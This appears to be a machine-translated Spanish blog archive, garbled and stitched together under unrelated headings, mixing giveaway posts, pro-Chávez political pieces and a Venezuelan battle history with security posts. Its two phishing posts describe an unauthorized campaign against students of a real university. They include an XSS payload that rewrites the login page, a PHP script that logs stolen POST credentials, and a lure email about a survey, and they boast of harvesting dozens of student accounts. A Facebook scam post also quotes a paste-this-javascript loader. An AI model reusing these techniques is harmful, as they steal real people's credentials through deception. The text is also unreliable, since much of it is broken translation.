Wednesday, April 27, 2011

Marks On Forehead Headache

I have not had time to write so far, but wanted to share with you a little bit of this day. Today was my birthday, but better not say the years I've met because they are many, lol.
Thanks to all who have welcomed me and congratulated me when they find out. Besitos.

Sunday, April 24, 2011

Should I Workout During A Hsv Breakout?


TRUTH "Whoever visits my profile on facebook"

After seeing that some people criticize and use the "alleged" service Facebook, which identifies who has visited our profile, I became curious as always , and from looking at how it works and what results you are service returns.

As a first impression, I doubt that people outside the development group facebook, be able to make a script that identifies who has visited my profile, if Facebook does not, is because it has not been created, so that first say "It's a # FAIL!" .

Look to see what we get.

As a first step, we entered , but actually is located in , well now look at the source code and WTF!, This trendy use Clickjacking on Facebook.

already entered the web and as a second step tells us to copy and paste something in the window on facebook, look concerned.

javascript: (
a = (b = document

). CreateElement ('script')
). Src = '/ / / app.js? " + Math.random (), b.body.appendChild ( a); void (0)

WTF! because you need to trick users with things that he probably does not understand?. Decode this into words.

De-Coding: What makes the above code is in the body element, create a script that has the address / app.js plus a randomly generated number -still does not stop what-. In conclusion, adding an external script.

Now follow the third step, that is, to click on me like, why should I give my love to the service before using it?, Logically, should not be after seeing his performance?. In order to continue, we to analyze.

 # 3A% 2F% 2F & src = sp

For this there is much to say only in the state adds the URL of the service.

Figure 1: Share service.

As 4 and last step tells us to click a button to go to the application, which is actually a link to / carga.php , but WTF! is redirected to . oO!

so far nor were seen as running to see which friends have seen my profile, we have only the script of the 2nd step, we analyze it.

Using an online tool to identity the JavaScript code, I quickly discovered that always pulls the same values, huge FAIL! jajajajaa, only takes a few of our friends and concatenated with the values \u200b\u200bestablished look.

/ *
* NOTE:% tf% corresponds to the name of my friend.
* / var

PostMessage = 'Top of visitors to your profile today
% tf% - 19% tf%
visits - 16 visits
% tf% - 15% tf%
visits - 13 visits
See you too who You are looking at entering:
really works! ";

far and as I said in principle this is a scam, but I see how my friends who choose to sort them on visits, but that perhaps at another time, I have an application program and I should not waste time, but left with a doubt.

I hope now with this short explanation, do not fall into the trap of those who just want to spam.

GENERAL CONCLUSION: This is a fraud!

Wednesday, April 20, 2011

Wording For Guests Paying For Their Own Meal

TODAY IS MY BIRTHDAY AND THE WINNER IS .................. Definitie

Finally the day came to publish the drawing!

Draw Results:
  • Seat 1: 3 - embodies

If you want to see the draw here is the link
I will contact ENCARNI for give me directions and choose your gift (baby how lucky you are to me in 6 months I have not touched any of the draws bloggers and you've already got several! right?)
At rest, thank you for your participation and I wish you better luck in the next drawing.

Tuesday, April 19, 2011

Repairing Fake Leather Couch


  1.  AINODEA         
  2. CHISPITAS         
  3. ENCARNI       
  4. DIANA
  11. Montse Arias
  12. MARA
  14. LUISA
  16. INMA
  18. ESTHER
  19. MAMEN
  20. CARMEN
  21. LORENA
  22. ELENA
  23. CRISS
  24. EVANI
  26. OLGA
  27. PASPA the jewels of
  29. SIBI
  30. CARMEN
  31. LAURA
  32. AMPARO
  33. NANI
  36. ESTHER M ª JESUS \u200b\u200bAND
  37. CRISTINA ( unapsicologaencasa)
  38. http:// #! / elmardeesdras/status/ /
  39. M ª JESUS \u200b\u200b

Sunday, April 17, 2011

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Thursday, April 14, 2011

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Comandante Chávez: "On April 13 was the great victory of the masses"

- "The Bolivarian Revolution will not lie down nor sifrinos or laburguesía or anything or anyone."

- "Comandante Chavez warned that after the coup 9años who carried out the assassination of Venezuelan parajustificarlo, all authors have evaded their responsibilities eincluso deny it."

- "If they come back with an eleven have their thirteen"
Here is the people's government of Venezuela in their diferentesmanifestaciones, civil and military, as a key factor laRevolución Bolivarian President Hugo Chavez said the inmensaconcentración that this Wednesday will bet all along laavenida Urdaneta Caracas, after a massive march with since Plaza Venezuela in celebration of 9 years great Victoriacontra the dictatorship, when he became a national historic landmark.

"The Bolivarian Revolution will not lie down nor sifrinos or laburguesía or imperialism, or anything, or anyone," said Chavez, vozronca from the flu, before Venezuelans marched in sumayoría colored red and filled with flags, slogans and posters the vast avenue of Caracas.

"In the Great Revolution of April 13 also commemorate, on this day comoparte heroic and glorious, MiliciaBolivariana Day," said Chavez, noting the more than 300 batallonesdesplegados on this day, in a televised deRadio and chain-TV, due to almost no media coverage privadoshicieron on this day.

"At this hour the rats were running out ...", Chavez continued, recalling the behavior that showed the dictator Pedro Carmona Estangay his accomplices that Saturday 13 April. "When I say burn rats beg pardon ...", rats ladies added under lospresentes laughter. "... Because they were real rats salieroncorriendo policy when the people who recovered to Miraflores and democracy."

"These thieves policy Miraflores left behind, porquemás will never stain the honor of this people of this country, of the Armed Forces."

"Over the mob will never stain the honor of the people and soldadovenezolano, they can write where they want," he predicted, chanted by Singingpower.

Commander convinced that Chavez said April 13 2002el people saved the future to the children and grandchildren of Venezuela.

"We saved the 21 st century Venezuela, the future of our children and grandchildren AOur. We shall continue with ever greater wisdom, emotion and heart, love, detachment, awareness and unity, continue to build the Socialist Fatherland."

"For the Motherland Venezuela they say and what I think ... the Socialist Motherland is ours or country or not."

historical Gesta silenced by the media is stateless:

Chavez recalled the stateless behavior decomunicación private companies, their owners and some of its employees journalists and wanted quesilenciaron erase the past "is unavergüenza for them and for us is heroic."

commented the President to the heroic and historic protagonizóel Venezuelan people has not happened in any time of historiamundial.

"It has never happened in 100 years, a government elimperio overthrown by U.S. and supportive of the oligarchy and a large number degenerales, return. It was a miracle in the hands of people

said that all the bourgeoisie, private banks, means dedesinformación and over 100 different gradoscomprometidos general, and behind them deEEUU imperial economic interests, crashed with a mighty power.

"We came upon a hit with great power, only that great empire and the bourgeoisie poderdel collided with a Power greater: the Venezuelan delpueblo and true soldiers. It crashed."

shamelessness of the political right bastard:

El Comandante Chávez warned that after 9 years of ignominiosaconspiración who managed to overthrow a legitimate government, using elasesinato Venezuelans to justify it, all authors hanevadido their responsibilities and even deny to the Venezuelan opiniónpública.

Taking ideas disseminated by journalist José Vicente Rangel, said that there is a political event in Venezuela which has quedadotanta evidence, evidence and testimony recorded, published ytransmitidos noticeably and communications, and participaronse who refuse to acknowledge its responsibility. "And this shows the extent of the political class deirresponsabilidad the derechavenezolana bastard."

"Sinvergüenzura who are still saying that there was no coup and yorenuncié" he said, commenting that the National Assembly (AN) a coup dreams are welcome deputies accused him of having given up potential income change.

"With brazenly dared comocondición say U.S. dollars asked to resign ... That says a lot about the likes of this clasepolítica that the intention to rule the country. But tienenautoridad or moral to govern a country awakened yheroísmo their dignity. "" They have no how! "

Chavez, the drizzle that continued throughout the day, dijoque with the unity of revolutionary forces venezolanodemostrará the right people who will not return this year or the next or inall of the century.

"Most never return to rule the independent Venezuela, marching towards socialism."

Unit against the right in 2012:

The head of state reiterated that the rightwing opposition and challenged tienecandidato not get it out to the arena, in preparation for presidential laselecciones 2012, said the battle will be destabilizing lies contralateral empire and its local lackeys. Comparing

little experience of government in the year of the coup, 2002, barely three years, sailing between two stools Revolution stop in front of the power of the empire, now in the beginning of 21 century segundadécada the Bolivarian Government is PoderPopular strengthened, with strong military power and socialist ideas.

Unlike the past, warned today estáblindado and the Bolivarian government has contingency plans to deal with coup cualquieraventura like 9 years ago.

called governors, municipal mayors, ministers of the Revolution yfuncionarios not allow the power políticodegenere otherwise.

"If we forget the people or give back, or govern paraotros interests than the people, would be lost and perdiendoel path of great Bolivarian Revolution."

"We have to govern by obeying the people. That's why determined esencialque this way and it will continue to determine ".

" That hope of a people, independence, hope, equality, peace and social justice. 're Building it and not let quenadie us from true peace, and what Bolivar said: lamayor sum of happiness possible. "

" here 9 years ago saved the future. You saved the future deVenezuela ...", he said, and paid tribute to those who fell victim to lasbalas fascists on the streets of Caracas.

thanked these martyrs for this planting forzoza and susfamiliares, and the survivors who faced groups used a march choqueque to try to storm the palace and asesinaral president.

told the sectors involved in this bourgeois coup of 2002, Yque continue to destabilize, not to forget the slogan that the pueblomantienen Live: "If they come back with an eleven have their thirteen".

The President of the Bolivarian Republic of Venezuela ended suspalabras with the cry "Socialist Fatherland or Death!" that fuerespondido in impressive form for the Venezuelans in a ecointerminable:


Tuesday, April 12, 2011

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Thursday, April 7, 2011

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Phishing Phishing ITM ITM

Explanation ITM
As I see that research is a success, explain how the procedure was implemented to obtain the user accounts of students Metropolitan Institute of Technology (ITM). Mainly know that the browser is vulnerable to XSS -I remember an exhibition on the subject of mother tongue last fall, where he talks of the main mistakes- programmers, I first had some questions that my friends helped me solve one of them was how to do to hide the original content of this page to put my malicious code. Knew was done with JavaScript, but did not know he was. My friend Yoyahack , saying it helped me was as follows.
document.body.innerHTML = 'Hello World';

now as it had, went straight to the XSS and perform the following Proof of Concept (PoC) , gave me some errors by the double quotes simple, special characters, I got bit by looking to see how I could fix it. After a while, the errors disappeared with some modifications that I made and Phishing page was complete. Now all that remained was to create the page where captured data sent.

On my server create a file called xss.php with the following code,
$ sContenido = "";

foreach ($ _POST as $ svar => $ sval) {$ sContenido
.= $ sval. "-" $ sContenido

} .= "\\ n";
$ sPathFile = "XSS.txt"
$ sFileOpen = fopen ($ sPathFile, "a");
fwrite ($ sFileOpen $ sContenido)
fclose ($ sFileOpen)

header ("Location:

The above code captures all the POST method variables and stores them in a text file called XSS.txt , saving data is re-routed to the original page that validates the input data, and as we do not send data directly to that page will jump a error (Figure 1) , this in turn is re-routed to the original login.
Figure 1: error message.

already had everything complete, it was time to do local tests to see if it worked or had other errors. Enter my STRING
were many, too many characters and so far had no nungin problem. I extracted some code to display it.
# "% 3Cscript% 3Edocument.body.innerHTML% 20 =% 22% 3Chtml% 20xmlns = '
/ xhtml'% 3E% 3E% 3Chead% 3Cstyle% 20type = 'text / css'% 3E% 3E% 3C/style% 3Cmeta%
20http-equiv = "Content-Type'% 20content = 'text / html;% 20charset = iso-8859-1'% 3E% 3Ctitle% 3EITM% 20 -% 20%
Institute 20Tecnol% C3% B3gico% 20Metropolitano% 3C/title% 3E% 3Clink% 20rel = 'stylesheet'
% 20type = 'text / css'% 20href = 'index.css'% 3E% 3C / head% 3E% 3Cbody% 3E% 3Cdiv% 20id = 'wrapper'
% 3E% 3Cdiv% 20id = 'header'% 3E% 3Cdiv% 20id = 'header-left'% 3E% 3CA% 20href = 'http:// www.itm. '% 3E% 3Cimg% 20src =' images / logoITM.png "% 20alt = 'portal%' 20title% = '20ITM portal
0ITM% 2'% 3E% 3C / a% 3E% 3C/div% 3E% 3Cdiv% 20ID = 'header-right'% 3E% 3Cdiv% 20ID = 'topmenu'% 3E% 3C% 3E% 3Cspan
p% 20style = 'color:% 20rgb (11, 20 141%,% 20178);% 20 '%% 3EEnglish 20version 3C/sp
% to% 3E% 20
estiondelaCalidad.aspx '"#

But when sending the POST request my file in my server, got an error
(Figure 2)
, so I got to thinking about how could solve the problem, I guess that the error was in the amount of characters that were used.
Figure 2: Error So I used that as an easy way
upon receiving the data on my server.

iframe and the code I wrote was injected directly in a page on my server. Now change the malicious code,
# % 3Cscript% 3E
document.body.innerHTML% 20 =% 22% 3Ciframe
% 20src = 'http:// [MI-SERVER] / xss / index.php % 20width = '100% '% 20height = '100%'% 3E% 3C/iframe

% 22% 3E% 3C/script% 3E


is not the best option because you see the scroll, pfff but wanted to do it quickly and I only found this solution.

had already created to send emails from the social engineering for students enter and write his book on my page Phishing. Among my personal mail of the institution and look to see which was the topic that stood out and had more repetitions, and the topic was the mailing had surveys in the institution, so that was the issue.
also had the problem that the mail that was created was to hotmail, so when I sent an e-mail to other students, is coming to the tray of SPAM, so some or it would, you could get me one of the institution itself but I would take more time.
As previously said the issue that I will use to deceive the student surveys, so I sent a general email with the following information
(Figure 3)
Figure 3:
Mail sent to the malicious link.
Now that everything is ready and sent mail, I waited about 5 hours and the result was very satisfactory since in that time I have won more than 50 user accounts.
As if it had achieved original account of the institution, is talking about come directly to your inbox
For now is all, wait to see more results I have.

In 5 days I will write to put the full disclosure of information collected.

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Tuesday, April 5, 2011

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Phishing + ITM University

some months back had the curiosity to see how vulnerable it may be the university where I study, so testing a bit between XSS

"I never liked this kind of bugs, has a lot of social engineering that takes a lot to me my-, so I will use them to see if they ever learn. XD. Use [+ Phishing XSS] .
This is a research project to see how far I can go with an XSS
and a little imagination see

started the today (April 5, 2011), with the collaboration of some people such as my good friends:
, Yoyahack and the big sissy Progressive Death (is a fag from here to China maybe after some # FAIL's place I made this queer HDP). I EXPECT TO GET IT?
As I said before I never liked this type of vulnerability, I thought I could not get anything unless they successfully apply social engineering to steal user sessions. I always saw him as a low-level bug.
The main feature at 100% is to get more users and passwords of students from my university to keep track of security implemented in this institution.

DAY 1:

(April 5, 2011)
Introduction to the operation and construction of the building on the XSS phishing site exists.
    Creation file server that housed the reception Information Phishing Page
  • (As is a free hosting I need to wait 24 hours for activation)
  • . Creating
  • email which is sent from the method of social engineering. (Although I have no idea what message they send to try to cause the access of each student)
  • Creating malicious files (data reception, storage and passwords)
  • .

Day 2:

(April 6, 2011) It had planned to create an HTML identical to the original to avoid suspicion. So using JavaScript and HTML page was created successfully Phishing, but when some tests sending and receiving data, the server stopped working free for the amount of characters in the POST request, so I think of play and the only option I found was to make an iframe and call Phishing page that was hosted on my free server. It looks a little more for the scroll of the iframe but just as important is not try to hide it or you do not leave like that. Looking at some post
    sent by the university administration in a higher average was addressing the issue of a survey. So try to get me on that side to see if students fall into the trap: D
  • would not be as evil receiving mail, you may not reach your Inbox but the spam. So on second thought I'll leave this option in the background and try to get me one of the institution itself. If I can not get it I'll leave it as I had initially thought.

Day 2:

(April 6, 2011 - 03:00 PM)
At 3 pm on April 6, 2011, we began the first general test of Phishing.
    As said, the malicious mail sent comes the SPAM folder, filter-
  • "Damn, I sent it yet as I managed to get the bill.

Day 2:

(April 6, 2011 - 09:15 PM)
I lingered a while, perhaps a few days, but I see some people review constantly SPAM folder. I have at least approximately 87 records
-Some repeatedly-
    , wait 5 more days to see what else I can get accounts.

Day 3:

(April 7, 2011 - 02:25 PM)
So far no update.
    I will publish the method used. Here [Explanation Phishing
  • ITM]
  • Day 4:

(April 8, 2011 - 11:43 PM)

    So far no update.
  • send e-Phishing again.

Day 5:

Only one record more.

As far as I can not get this research will tell you here and I always argue, I am not responsible for the disclosure of information by you to complete the project. Is an important step to validate the reliability of the data.

Saturday, April 2, 2011

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Hi Tod @ s ! Sorry to keep you waiting, but Saturdays are usually busy days for football matches of Paul and the dogs training, in short, that once we got home (yesterday I copied all names), Paul made the draw. And the winner was ..... so ta ta chan .......

Bethlehem (Bethlehem Patchwork) Congratulations!

Here I put the pictures of how the draw was made and well, thank you all for your participation, one month has been very exciting to receive messages (especially on the accompanying non-profit) and your comments and your visits me made us smile.

And the winner:
Bethlehem, send me an email with your address and as soon as you have the stock control (I'll tell you at last Informal Gitana is the owner and will certainly be happy to After all what is a shoulder bag without hanging go, jajaj.

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192 years of the Battle of The Middle Queseras

At dawn on April 2, 1819, near the Herradero Mata, south of the River Arauca, one hundred fifty-three men of the patriot army, commanded by General José Antonio Páez, started one of the most heroic military exploits and unique Venezuelan and South American Independence: The Battle for Middle Queseras, a leading military action campaign call Apure.

The battle for Middle Queseras occurred after Simon Bolivar after the battle of Gamarra on 27 March retreated in Marrereños Potreritos to the right of the Arauca River, where the English leader Pablo Morillodecidió attack.

José Antonio Páez aware of the objectives deMorillo, head of 153 horsemen to swim and unseen Elrio Arauca April 2, 1819 and heads against elcampamento realistic 3 columns, after having crossed the river últimocaballo Republicans move against the camp.

Morillo to elataque Paez , moved his army with the cavalry at least a thousand 200 riders in front, so the "Centaur of the Plains " retreated in the direction where Bolívar had bet unaunidad infantry. To the apparent withdrawal of forces dePáez, Morillo ordered a squad under the leadership of Narciso López paecista surround the army.

For its part, instructed Páez Juan José López Rondónque attacked for it unasola gather his squad in column, when that happens, Paez ordered back faces and the forces ataquesobre Narciso López. The effect of this maneuver paecista lacaballería was to sow chaos and confusion in ejércitorealista.

The action of the Lancers of Paez was facilitated by the police hechode Lopez dismounted DeSUS to use rifles.

view forces attack caballeríarealista patriots and retired with precipitation fell on his propiainfantería, which was not overwhelmed by the choice of Morillode taken quickly to a nearby forest, where they took refuge.

Elbalance the confrontation between the patriotic forces and realistic in secalcula 2 killed and 6 wounded for the first, against 400 casualties models seconds.

month and a half before that legendary battle, Simón Bolívar installed the Congress of Angostura (15 February, 1819), where he was awarded the presidency of the Republic and the task of ridding their provinces of English power. With such powers and purposes, the Liberator moves downwards to meet with Paez Apure, which get into Caujaral of Cunaviche, along with three thousand men.

March 27, the headquarters of Liberation Army is installed on Potreritos Marrereños. While across the Arauca River, Pablo Morillo, Captain General of the English army, seven thousand five hundred realistic bet.

Bolívar Páez proposes a surprise attack the enemy. Approved the action, one hundred fifty-five lancers, officers and troops riding across the Arauca river without being spotted. Páez riders organized into seven groups, led respectively by the officers, Francisco Carmona, Francisco Aramendi, Cornelio Muñoz, Juan Antonio Mina, Juan Gomez, Fernando Figueredo and Juan José Rondón. Lt. Jose Silva returned to Camp Patriot, but until this is to know the reasons.

received the motion information, Morillo orders from two columns of cavalry to wrap insurgents. Thousand riders up the columns, including advance two hundred policemen led by Narciso López Caracas officer, who after the emancipation of Venezuela in 1821, as a forerunner and martyr of Cuban Independence deliver life, shield and flag this Caribbean island.

Trot and in perfect order, simulating the Lancers patriots flee towards the infantry unit that Bolívar had bet on the banks of the Arauca. Morillo confident, decided to advance López squad divided into two columns. In reaction, Paez ordered Lt. Col. Juan José Rondón patriot with his group to attack the police realistic vision of bringing together in one column. Lopez joins the riders and send them to use rifles, for which they must dismount from their horses.

immediately, Paez ordered his famous maneuver toward the enemy back with the cry "back faces "(or" go fuck "), which overwhelmed the police and put to flight the rest of the royalist cavalry almost poured over their own infantry, which prevents the outrage by the shelter to get into the nearby forest .

Victory faces stained with the blood of patriots four realistic that supply blood to the battlefield. The winners will return to the patriot camp with only two casualties: Isidro Sergeant and Corporal Manuel Mujica Martinez. The next day, would join those killed Captain Francisco Antonio Salazar, then to be removed along with five others wounded comrades.


The triumph of the cheese environment is unique. Bolívarfelicitó Paez and his men: "You just run the exploit másextraordinaria you can celebrate the military history of the naciones.Lo you have done is merely a prelude. Victoriaque Count to bear on the tips of your spears and bayonets your "military action in the Middle Queseras during an operation known as" back face "

The April 3, 1819, Bolívar rewards hundred and fifty lancers Paez with the Cross of the Libertadores, they also drafted a proclamation titled "A Braves Apure Army," which ends with the following call:
      "Soldiers! What has been done is but a prelude of what you can do. Prepare to fight and have the victory that bear on the tips of your lances and your bayonets. "/.

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"The Opposition tachirense meeting suffering with Chavez and his Colombian counterpart"

A Trial of Luis Mendoza: Even when the integration American

Lospresidentes of Colombia, Juan Manuel Santos, and Venezuela, HugoChávez, at its third meeting to be held on April 9, will strengthen the bonds of reciprocity, as defined a new trade agreement for economic revival and strengthening of trade at the border, as part of a historic juncture contribution to development of both nations, and of integration policies, which does not recognize opposition to those interested war and not peace in our border.
These findings correspond to the President of the Legislative Council of Tachira, Congressman Luis Mendoza, señalarque in the government of Alvaro Uribe, the opposition always played alresquebrajamiento of relations with Colombia, where interesesde the Colombian oligarchy differed in political perspective, on integration playing into the interests of the American empire.
Luis Mendoza said that the oppositional, not interested in agreements and meetings laeconomía leverage, which we see policy framed in wide, dondeambos presidents reviewed a draft trade agreement, new rules queestablecerá for their trade.
Luis Mendoza vecon welcome the educational performance of our ComandantePresidente to publicize and inform all Venezuelans yvenezolanas, scope, importance, such as beneficiosrecíprocos of the agreements, economic, social, health, energy, electricity, gas and other areas contributing to the integration process in Latin America.
yesterday's meeting of two presidents, shake again these ties of friendship and solidarity held by Colombia and Venezuela, Bolivarian countries that have moved the same paths our Liberator Simon Bolivar, waving flags of freedom and independence.
Luis Mendoza said that these agreements bring very positive results, and that in eight months of President Santos, has been a reaffirmation of our bilateral relations, clouded by the Uribe government, and today with the signing of agreements trade cooperation, border integration, raising the awareness levels a commitment ; Latin American and Caribbean unity, where one voice tell the Empire not war, respect for self-determination, not more conflict, we want peace.
In this regard, Luis Mendoza, said the government of Alvaro Uribe was marred with difficulties, but withthe integration and humanitarian vision of our comandante Chávez andthe political rationality the current President of Colombia Juan Manuel Santos, advance every day, because the situation is radically different in a pragmatic and supportive relationship, he said.
In conclusion, said Luis Mendoza, who arrangements in the commercial area are broad and ambitious, as are outstanding agreements SIGNED for the resumption of air routes between The two-country sale of Venezuelan gasoline for provinciascolombianas of the border, and joint projects in the border deinfraestructura, he concluded. /.

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tachirenses Youth participate in the creation of the Ministry of Popular Power for

Until Friday April 1, youth and students in 29 cities delestado Táchira discutireron and provided to develop the structure, mission and Vision, the Ministry of Popular Power for Youth.

This was unveiled in charge of the National Institute of Youth Tachira Jose Amado, who said that "eshistórico that a National Government under a ministry with accurate policies aimed asatisfacer the need of youth. "

Amado said that the idea is to group deliceos young students and universities in each house of study, to discuss the role delnuevo ministry for the transformation of society, among other issues related to education revolution times.

The activity culminates with a discussion of 2 deabril State Authority on Saturday from 10:00 am at the Plaza Bolivar SanCristóbal city where youth congregate deVenezuela United Socialist Party, other groups and revolutionary youth and students to address the contributions nomilitantes end of the discussion.

"It has been demonstrated once again the politics of participation that has Revolutionary elGobierno, who calls us to build the ministry, elsocialismo and assume the lead role, democratic, participatory, that through this revolutionary process is consolidated." He added Amado.

Finally, Beloved is calling on all young students at universities and colleges ofall the state participate in estasdiscusiones, "because we are ensuring lapatria, called the challenge of strengthening a society socialist, just eincluyente ."./.